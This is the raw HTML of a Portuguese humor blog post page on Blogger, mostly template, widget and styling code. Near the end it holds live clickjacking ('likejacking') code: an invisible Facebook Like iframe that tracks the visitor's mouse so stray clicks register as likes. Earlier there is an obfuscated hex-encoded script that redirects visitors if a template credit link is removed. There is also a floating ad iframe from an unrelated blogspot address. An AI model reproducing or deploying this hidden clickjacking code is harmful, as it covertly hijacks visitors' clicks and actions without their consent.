</span>
<div class='clear'></div>
</div><div class='widget Navbar' data-version='1' id='Navbar1'><script type="text/javascript">
    function setAttributeOnload(object, attribute, val) {
      if(window.addEventListener) {
        window.addEventListener('load',
          function(){ object[attribute] = val; }, false);
      } else {
        window.attachEvent('onload', function(){ object[attribute] = val; });
      }
    }
  </script>
<div id="navbar-iframe-container"></div>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
<script type="text/javascript">
      gapi.load("gapi.iframes:gapi.iframes.style.bubble", function() {
        if (gapi.iframes && gapi.iframes.getContext) {
          gapi.iframes.getContext().openChild({
              url: 'https://www.blogger.com/navbar.g?targetBlogID\x3d2711958327308504123\x26blogName\x3dHumor+cascando\x26publishMode\x3dPUBLISH_MODE_BLOGSPOT\x26navbarType\x3dLIGHT\x26layoutType\x3dLAYOUTS\x26searchRoot\x3dhttp://humorcascando.blogspot.com/search\x26blogLocale\x3dpt_BR\x26v\x3d2\x26homepageUrl\x3dhttp://humorcascando.blogspot.com/\x26targetPostID\x3d3202198115409608565\x26blogPostOrPageUrl\x3dhttp://humorcascando.blogspot.com/2014/07/cara-vamos-embora-desse-carro-que-deu.html\x26vt\x3d-8868150791832940964',
              where: document.getElementById("navbar-iframe-container"),
              id: "navbar-iframe"
          });
        }
      });
    </script><script type="text/javascript">
(function() {
var script = document.createElement('script');
script.type = 'text/javascript';
script.src = '//pagead2.googlesyndication.com/pagead/js/google_top_exp.js';
var head = document.getElementsByTagName('head')[0];
if (head) {
head.appendChild(script);
}})();
</script>
</div>
</div>
<p></p></div>
<!-- spacer for skins that want sidebar and main to be the same height-->
<div class='clear'>&#160;</div>
<div style='clear:both;'></div>
</div>
<!-- end content-wrapper -->
<div id='rsidebar-wrapper2'>
<div style='height:5px;clear:both;'></div>
<div class='sidebar no-items section' id='sidebarright2'></div>
<p></p></div>
<div class='right'>
<div class='pics rounded-8'>
<div id='rsidebar-wrapper'>
<div style='height:5px;clear:both;'></div>
<div class='sidebar section' id='sidebarright3'><div class='widget HTML' data-version='1' id='HTML2'>
<div class='widget-content'>
<!-- BEGIN MOVE -->

<style type="text/css">

#topbar2{
position:absolute;
border: 2px solid orange;
padding: 0px;
background-color: #ffffff;
width: 300px;
visibility: hidden;
z-index: 250;
}

</style>

<script type="text/javascript">


var persistclose=0 //set to 0 or 1. 1 means once the bar is manually closed, it will remain closed for browser session
var window_width = screen.width;

var startX = ((window_width - 1000) / 2) //set x offset of bar in pixels
var startY = 110 //set y offset of bar in pixels

var verticalpos="fromtop" //enter "fromtop" or "frombottom"

function iecompattest(){
return (document.compatMode && document.compatMode!="BackCompat")? document.documentElement : document.body
}

function get_cookie(Name) {
var search = Name + "="
var returnvalue = "";
if (document.cookie.length > 0) {
offset = document.cookie.indexOf(search)
if (offset != -1) {
offset += search.length
end = document.cookie.indexOf(";", offset);
if (end == -1) end = document.cookie.length;
returnvalue=unescape(document.cookie.substring(offset, end))
}
}
return returnvalue;
}

function closebar(){
if (persistclose)
document.cookie="remainclosed=1";
document.getElementById("topbar2").style.visibility="hidden";
}

function staticbar(){
 barheight=document.getElementById("topbar2").offsetHeight
 var ns = (navigator.appName.indexOf("Netscape") != -1) || window.opera;
 var d = document;
 function ml(id){
  var el=d.getElementById(id);
  if (!persistclose || persistclose && get_cookie("remainclosed")=="")
  el.style.visibility="visible"
  if(d.layers)el.style=el;
  el.sP=function(x,y){this.style.left=820+"px";this.style.top=y+"px";};
  el.x = startX;
  if (verticalpos=="fromtop")
  el.y = startY;
  else{
  el.y = ns ? pageYOffset + innerHeight : iecompattest().scrollTop + iecompattest().clientHeight;
  el.y -= startY;
  }
  return el;
 }
 window.stayTopLeft=function(){
  if (verticalpos=="fromtop"){
  var pY = ns ? pageYOffset : iecompattest().scrollTop;
  ftlObj.y += (pY + startY - ftlObj.y)/8;
  }
  else{
  var pY = ns ? pageYOffset + innerHeight - barheight: iecompattest().scrollTop + iecompattest().clientHeight - barheight;
  ftlObj.y += (pY - startY - ftlObj.y)/8;
  }
  ftlObj.sP(ftlObj.x, ftlObj.y);
  setTimeout("stayTopLeft()", 10);
 }
 ftlObj = ml("topbar2");
 stayTopLeft();
}

if (window.addEventListener)
window.addEventListener("load", staticbar, false)
else if (window.attachEvent)
window.attachEvent("onload", staticbar)
else if (document.getElementById)
window.onload=staticbar

</script>

<div id="topbar2" style="visibility: hidden; left: 580px; top: 5689px;" align="right">

<iframe marginwidth="0" marginheight="0" src="http://dhaiudhaiuhdiu.blogspot.com.br/p/blog-page.html" width="300" frameborder="0" height="600" scrolling="no"></iframe>

<div style="position: absolute; left: 0px; top: 0px; width: 0px; height: 0px;">
<span onclick="javascript:window.closebar()">

<img src="http://pe360graus.globo.com/noticias/img/btFecharGal.gif" title="Fechar Anúncio" width="3" /></span>

<!-- OPEN MOVE--></div></div>
</div>
<div class='clear'></div>
<span class='widget-item-control'>
<span class='item-control blog-admin'>
<a class='quickedit' href='//www.blogger.com/rearrange?blogID=2711958327308504123&widgetType=HTML&widgetId=HTML2&action=editWidget&sectionId=sidebarright3' onclick='return _WidgetManager._PopupConfig(document.getElementById("HTML2"));' target='configHTML2' title='Editar'>
<img alt='' height='18' src='https://resources.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/>
</a>
</span>
</span>
<div class='clear'></div>
</div></div>
<p></p></div>
<div class='clear'>&#160;</div>
<div style='clear:both;'></div>
</div>
</div>
</div>
<div style='clear:both;'></div>
<div style='clear:both;'></div>
</div>
</div>
<!-- end outer-wrapper -->
<div class='' id='footer'>
<div class='wrapper'>
<div class='left'>Humor cascando &#169; 2012  . Traduzido Por: <a href='http://www.templateparablogspot.com' id='myconten'>Template Para Blogspot</a> - Designed by <a href='http://www.templateism.com' id='mycontent'>Templateism</a></div>
<div class='right'>
<a href='/'>Inicio</a> / 
<a href='http://www.templateparablogspot.com/'>Contato</a> /
<a href='http://www.templateparablogspot.com/'>Parcerias</a> /
<a href='http://www.templateparablogspot.com/'>AJuda</a> /
</div>
<div class='clear'></div>
</div>
</div>
<style type='text/css'> .clearfix:after{content:"\0020";display:block;height:0;clear:both;visibility:hidden;overflow:hidden} #container,#header,#main,#main-fullwidth,#footer,.clearfix{display:block} .clear{clear:both} h1,h2,h3,h4,h5,h6{margin-bottom:16px;font-weight:normal;line-height:1} h1{font-size:40px} h2{font-size:30px} h3{font-size:20px} h4{font-size:16px} h5{font-size:14px} h6{font-size:12px} h1 img,h2 img,h3 img,h4 img,h5 img,h6 img{margin:0} table{margin-bottom:20px;width:100%} th{font-weight:bold} thead th{background:#c3d9ff} th,td,caption{padding:4px 10px 4px 5px} tr.even td{background:#e5ecf9} tfoot{font-style:italic} caption{background:#eee} li ul,li ol{margin:0} ul,ol{margin:0 20px 20px 0;padding-left:40px} ul{list-style-type:disc} ol{list-style-type:decimal} dl{margin:0 0 20px 0} dl dt{font-weight:bold} dd{margin-left:20px} blockquote{margin:20px;color:#666;} pre{margin:20px 0;white-space:pre} pre,code,tt{font:13px 'andale mono','lucida console',monospace;line-height:18px} #search {overflow:hidden;} #header h1{font-family:'Oswald',Arial,Helvetica,Sans-serif;} #header .description{font-family:Arial,Helvetica,Sans-serif;} .post-title {font-family:Arial,Helvetica,Sans-serif;} .sidebar h2{ font-family:Arial, Helvetica, sans-serif; } #footer-widgets .widgettitle{font-family:'Oswald', sans-serif;} /* -- number page navigation -- */ #comment-form iframe{padding:5px;width:580px;height:275px;} .tabs-widget{list-style:none;list-style-type:none;margin:0 0 10px 0;padding:0;height:26px} .tabs-widget li{list-style:none;list-style-type:none;margin:0 0 0 4px;padding:0;float:left} .tabs-widget li:first-child{margin:0} .tabs-widget li a{color:#EE5441;background:url(http://1.bp.blogspot.com/-XdKq0pZFDrQ/UC7ewZkNUwI/AAAAAAAAAxw/s5pYAz9R6VQ/s000/tabs-bg.png) left top repeat-x;padding:6px 16px;display:block;text-decoration:none;font:bold 12px/12px Arial,Helvetica,Sans-serif} .tabs-widget li a:hover,.tabs-widget li a.tabs-widget-current{background:url(http://1.bp.blogspot.com/-XdKq0pZFDrQ/UC7ewZkNUwI/AAAAAAAAAxw/s5pYAz9R6VQ/s000/tabs-bg.png) left -126px repeat-x;color:#FFF;text-shadow:0px 1px 0px #000;text-decoration:none} .tabs-widget-content{} .tabviewsection{margin-top:10px;margin-bottom:10px;} #crosscol-wrapper{display:none;} .PopularPosts .item-title{font-weight:bold;padding-bottom:0.2em;text-shadow:0px 1px 0px #fff;} .PopularPosts .widget-content ul li{padding:0.7em 0;background:none} .widget-container{list-style-type:none;list-style:none;margin:0 0 15px 0;padding:0;color:#374142;font-size:13px} .widget-container2{list-style-type:none;list-style:none;margin:5px 15px 10px 0px;padding:0;color:#374142;font-size:13px} h3.widgettitle{background:url(http://1.bp.blogspot.com/-gFwNIT6i-gU/UC7emWzTiOI/AAAAAAAAAwg/9Wu_6pl6AoM/s000/widgettitle-bg.png) left top repeat-x;margin:0 0 10px 0;padding:9px 0 9px 10px;color:#FFF;font-size:16px;line-height:16px;font-family:'Oswald',sans-serif;font-weight:normal;text-decoration:none;text-transform:uppercase;text-shadow:0px 1px 0px #000;} div.span-1,div.span-2,div.span-3,div.span-4,div.span-5,div.span-6,div.span-7,div.span-8,div.span-9,div.span-10,div.span-11,div.span-12,div.span-13,div.span-14,div.span-15,div.span-16,div.span-17,div.span-18,div.span-19,div.span-20,div.span-21,div.span-22,div.span-23,div.span-24{float:left;margin-right:10px} .span-1{width:30px}.span-2{width:70px}.span-3{width:110px}.span-4{width:150px}.span-5{width:190px}.span-6{width:230px}.span-7{width:270px}.span-8{width:310px}.span-9{width:350px}.span-10{width:390px}.span-11{width:430px}.span-12{width:470px}.span-13{width:510px}.span-14{width:550px}.span-15{width:590px}.span-16{width:630px}.span-17{width:670px}.span-18{width:710px}.span-19{width:750px}.span-20{width:790px}.span-21{width:830px}.span-22{width:870px}.span-23{width:910px}.span-24,div.span-24{width:960px;margin:0}input.span-1,textarea.span-1,input.span-2,textarea.span-2,input.span-3,textarea.span-3,input.span-4,textarea.span-4,input.span-5,textarea.span-5,input.span-6,textarea.span-6,input.span-7,textarea.span-7,input.span-8,textarea.span-8,input.span-9,textarea.span-9,input.span-10,textarea.span-10,input.span-11,textarea.span-11,input.span-12,textarea.span-12,input.span-13,textarea.span-13,input.span-14,textarea.span-14,input.span-15,textarea.span-15,input.span-16,textarea.span-16,input.span-17,textarea.span-17,input.span-18,textarea.span-18,input.span-19,textarea.span-19,input.span-20,textarea.span-20,input.span-21,textarea.span-21,input.span-22,textarea.span-22,input.span-23,textarea.span-23,input.span-24,textarea.span-24{border-left-width:1px!important;border-right-width:1px!important;padding-left:5px!important;padding-right:5px!important}input.span-1,textarea.span-1{width:18px!important}input.span-2,textarea.span-2{width:58px!important}input.span-3,textarea.span-3{width:98px!important}input.span-4,textarea.span-4{width:138px!important}input.span-5,textarea.span-5{width:178px!important}input.span-6,textarea.span-6{width:218px!important}input.span-7,textarea.span-7{width:258px!important}input.span-8,textarea.span-8{width:298px!important}input.span-9,textarea.span-9{width:338px!important}input.span-10,textarea.span-10{width:378px!important}input.span-11,textarea.span-11{width:418px!important}input.span-12,textarea.span-12{width:458px!important}input.span-13,textarea.span-13{width:498px!important}input.span-14,textarea.span-14{width:538px!important}input.span-15,textarea.span-15{width:578px!important}input.span-16,textarea.span-16{width:618px!important}input.span-17,textarea.span-17{width:658px!important}input.span-18,textarea.span-18{width:698px!important}input.span-19,textarea.span-19{width:738px!important}input.span-20,textarea.span-20{width:778px!important}input.span-21,textarea.span-21{width:818px!important}input.span-22,textarea.span-22{width:858px!important}input.span-23,textarea.span-23{width:898px!important}input.span-24,textarea.span-24{width:938px!important}.last{margin-right:0;padding-right:0} .last,div.last{margin-right:0} </style>
<script>var _0x3333=["\x3C\x61\x20\x68\x72\x65\x66\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x74\x65\x6D\x70\x6C\x61\x74\x65\x69\x73\x6D\x2E\x63\x6F\x6D\x22\x3E\x54\x65\x6D\x70\x6C\x61\x74\x65\x69\x73\x6D\x3C\x2F\x61\x3E","\x68\x74\x6D\x6C","\x23\x6D\x79\x63\x6F\x6E\x74\x65\x6E\x74","\x6C\x65\x6E\x67\x74\x68","\x23\x6D\x79\x63\x6F\x6E\x74\x65\x6E\x74\x3A\x76\x69\x73\x69\x62\x6C\x65","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x74\x65\x6D\x70\x6C\x61\x74\x65\x69\x73\x6D\x2E\x63\x6F\x6D"];$(_0x3333[2])[_0x3333[1]](_0x3333[0]);setInterval(function (){if(!$(_0x3333[4])[_0x3333[3]]){window[_0x3333[6]][_0x3333[5]]=_0x3333[7];} ;} ,3000);</script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>

<script type="text/javascript" src="https://www.blogger.com/static/v1/widgets/2403248619-widgets.js"></script>
<script type='text/javascript'>
window['__wavt'] = 'AOuZoY5exukQxGad5BSR_BDpbJQj0FcrbA:1492316615620';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d2711958327308504123','//humorcascando.blogspot.mx/2014/07/cara-vamos-embora-desse-carro-que-deu.html','2711958327308504123');
_WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '2711958327308504123', 'title': 'Humor cascando', 'url': 'http://humorcascando.blogspot.mx/2014/07/cara-vamos-embora-desse-carro-que-deu.html', 'canonicalUrl': 'http://humorcascando.blogspot.com/2014/07/cara-vamos-embora-desse-carro-que-deu.html', 'homepageUrl': 'http://humorcascando.blogspot.mx/', 'searchUrl': 'http://humorcascando.blogspot.mx/search', 'canonicalHomepageUrl': 'http://humorcascando.blogspot.com/', 'blogspotFaviconUrl': 'http://humorcascando.blogspot.mx/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': false, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': '', 'useUniversalAnalytics': false, 'encoding': 'UTF-8', 'locale': 'pt-BR', 'localeUnderscoreDelimited': 'pt_br', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'feedLinks': '\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22Humor cascando - Atom\x22 href\x3d\x22http://humorcascando.blogspot.com/feeds/posts/default\x22 /\x3e\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/rss+xml\x22 title\x3d\x22Humor cascando - RSS\x22 href\x3d\x22http://humorcascando.blogspot.com/feeds/posts/default?alt\x3drss\x22 /\x3e\n\x3clink rel\x3d\x22service.post\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22Humor cascando - Atom\x22 href\x3d\x22https://www.blogger.com/feeds/2711958327308504123/posts/default\x22 /\x3e\n\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22Humor cascando - Atom\x22 href\x3d\x22http://humorcascando.blogspot.com/feeds/3202198115409608565/comments/default\x22 /\x3e\n', 'meTag': '', 'openIdOpTag': '', 'mobileHeadScript': '', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/4183ba16445b5c2c', 'plusOneApiSrc': 'https://apis.google.com/js/plusone.js', 'sharing': {'platforms': [{'name': 'Gerar link', 'key': 'link', 'shareMessage': 'Gerar link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Compartilhar no Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'Twitter', 'key': 'twitter', 'shareMessage': 'Compartilhar no Twitter', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Compartilhar no Pinterest', 'target': 'pinterest'}, {'name': 'Google+', 'key': 'googlePlus', 'shareMessage': 'Compartilhar no Google+', 'target': 'googleplus'}, {'name': 'E-mail', 'key': 'email', 'shareMessage': 'E-mail', 'target': 'email'}], 'googlePlusShareButtonWidth': 300, 'googlePlusBootstrap': '\x3cscript type\x3d\x22text/javascript\x22\x3ewindow.___gcfg \x3d {\x27lang\x27: \x27pt_BR\x27};\x3c/script\x3e'}, 'jumpLinkMessage': 'Mais informações &#187;', 'pageType': 'item', 'postId': '3202198115409608565', 'postImageThumbnailUrl': 'http://4.bp.blogspot.com/-FRpY0yWM5k0/U8SY_jaiy2I/AAAAAAAABUI/nefLuqmRCvM/s72-c/deumerda.jpg', 'postImageUrl': 'http://4.bp.blogspot.com/-FRpY0yWM5k0/U8SY_jaiy2I/AAAAAAAABUI/nefLuqmRCvM/s1600/deumerda.jpg', 'pageName': 'Cara! Vamos embora desse carro que deu merda kkk', 'pageTitle': 'Humor cascando: Cara! Vamos embora desse carro que deu merda kkk'}}, {'name': 'features', 'data': {'enhancedSourcesets': 'true', 'unsupported_browser_message': 'false'}}, {'name': 'messages', 'data': {'linkCopiedToClipboard': 'Link copiado para a área de transferência.', 'postLink': 'Link da postagem'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Personalizar', 'isResponsive': false, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\x3dtimeslide'}, 'isMobile': false, 'title': 'Cara! Vamos embora desse carro que deu merda kkk', 'description': '          ', 'featuredImage': 'http://4.bp.blogspot.com/-FRpY0yWM5k0/U8SY_jaiy2I/AAAAAAAABUI/nefLuqmRCvM/s1600/deumerda.jpg', 'url': 'http://humorcascando.blogspot.mx/2014/07/cara-vamos-embora-desse-carro-que-deu.html', 'type': 'item', 'isSingleItem': true, 'isMultipleItems': false, 'isError': false, 'isPage': false, 'isPost': true, 'isHomepage': false, 'isArchive': false, 'isLabelSearch': false, 'postId': 3202198115409608565}}]);
_WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'headerleft', null, document.getElementById('Header1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'main', null, document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/3657324980-lbx__pt_br.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/368954415-lightbox_bundle.css'}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML1', 'main', null, document.getElementById('HTML1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_AttributionView', new _WidgetInfo('Attribution1', 'sidebarright', null, document.getElementById('Attribution1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_NavbarView', new _WidgetInfo('Navbar1', 'sidebarright', null, document.getElementById('Navbar1'), {}, 'displayModeFull'));
_WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML2', 'sidebarright3', null, document.getElementById('HTML2'), {}, 'displayModeFull'));
</script>
</body>
<div id='clickjack-button-wrapper-5' style='position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:&#39;progid:DXImageTransform.Microsoft.Alpha(Opacity=0)&#39;;  margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden'>
<!--<div style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe allowTransparency='true' frameborder='0' scrolling='no' src='http://www.facebook.com/plugins/like.php?href=https://www.facebook.com/sonastroladas?ref_type=bookmark&layout=button_count&show_faces=false&width=50&action=like&colorscheme=light&height=21' style='border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;'></iframe>
</div>
<script type='text/javascript'>  jQuery( document ).ready( function() {  $( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {  jQuery( "#clickjack-button-wrapper-5" ).css( {  top: e.pageY - 10,  left: e.pageX + 30  } );  } );  clickjack_hider();  var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);  } );  function clickjack_hider(){  jQuery("input").mouseout(function(){ClickJackFbShow();});  jQuery("a").mouseout(function(){ClickJackFbShow();});  jQuery("button").mouseout(function(){ClickJackFbShow();});  jQuery("textarea").mouseout(function(){ClickJackFbShow();});  jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});         jQuery("object").mouseout(function(){ClickJackFbShow();});  jQuery("input").mouseover(function(){ClickJackFbHide();});  jQuery("a").mouseover(function(){ClickJackFbHide();});  jQuery("button").mouseover(function(){ClickJackFbHide();});  jQuery("textarea").mouseover(function(){ClickJackFbHide();});  jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();});         jQuery("object").mouseover(function(){ClickJackFbHide();});  }  </script>
<div id='fb-root'></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) {return;}
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/pt_BR/all.js#xfbml=1";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
</html>